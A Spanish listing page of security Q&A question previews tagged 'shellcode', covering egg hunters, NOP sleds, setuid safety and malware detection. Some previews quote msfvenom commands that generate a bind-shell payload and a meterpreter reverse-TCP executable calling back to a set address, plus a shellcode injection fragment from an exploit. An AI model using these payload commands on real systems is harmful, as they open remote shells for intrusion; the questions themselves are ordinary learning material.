Preguntas con etiqueta 'shellcode'

preguntas con etiqueta
1
respuesta

generando código shell de Unicode javascript

Estoy intentando generar shellcode para modificar este exploit: enlace Dice en el exploit básico: {'$where':'shellcode=unescape("METASPLOIT JS GENERATED SHELLCODE"); Y no estoy realmente seguro de lo que significa. En cuanto al otro códig...
hecha 01.07.2018 - 07:00
2
respuestas

¿Cómo se colocan los huevos en la memoria?

¿Cómo se coloca un huevo en la memoria antes de que se ejecute el código del cazador de huevos? Si una carga útil es demasiado grande para el búfer de explotación pero un cazador de huevos puede encontrar la carga útil, ¿la carga útil también...
hecha 16.04.2018 - 18:47
1
respuesta

Shellcode segfaulting

Actualmente estoy leyendo el libro El manual de Shellcoder de Wiley, y tengo un problema muy grave al implementar uno de los códigos de shell que generan shell del capítulo 3. El código es el siguiente: Section .text global _start _start:...
hecha 28.11.2016 - 10:31
2
respuestas

¿Es seguro usar setuid sin absolutamente ninguna entrada?

Tengo un script de shell que sincroniza algunos archivos desde una fuente remota y tengo una configuración de servidor HTTP bastante típica. Hay un usuario que posee los archivos servidos por el servidor HTTP y un usuario que ejecuta el servidor...
hecha 07.12.2014 - 00:34
1
respuesta

¿Cómo funciona el sled NOP con MSFVenom? [cerrado]

Estoy generando cargas útiles con MSFVenom y aquí hay una salida de muestra: user@localhost:~ $ msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x20' -i 3 -n 200 -f python No platform was selected, choosing Msf::Module::Platform::Windows fr...
hecha 17.03.2015 - 22:15
1
respuesta

¿Cómo encontrar imágenes maliciosas en el servidor?

Recientemente, mi sitio Drupal en un servidor Linux ha sido atacado por ataques de secuestro de sesión. Supongo que los ataques se originaron a partir de imágenes que contenían códigos maliciosos que se cargaron en la raíz web porque he encontra...
hecha 21.01.2014 - 03:25
1
respuesta

¿Cuál es el uso de diferentes tipos de shellcode? [cerrado]

Estaba navegando por la página de shellcode en el sitio web de exploit-db. ¿Cuál es el uso de todos estos programas shellcode diferentes y por qué debemos escribirlos?     
hecha 12.07.2018 - 00:31
2
respuestas

Carga útil de MSFvenom con opciones dinámicas

Estoy utilizando MSFvenom para exportar la carga útil de TCP inversa del meterpreter. Si bien esto funciona con msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe , s...
hecha 17.11.2017 - 06:55
2
respuestas

Analizador de PDF y OPcodeExtraction [cerrado]

Estoy realizando un proyecto universitario sobre detección de malware. Específicamente necesito: - extract javascript from a PDF, - put it in the right order,...
hecha 29.06.2017 - 12:26
1
respuesta

Descubriendo códigos de cifrado [cerrado]

¿Cuál es el nivel de complejidad de encontrar un código de cifrado cuando el documento de origen y el cifrado están disponibles? En términos prácticos: el malware en la computadora envía un documento al TPM y obtiene una versión cifrada.     
hecha 28.05.2017 - 03:46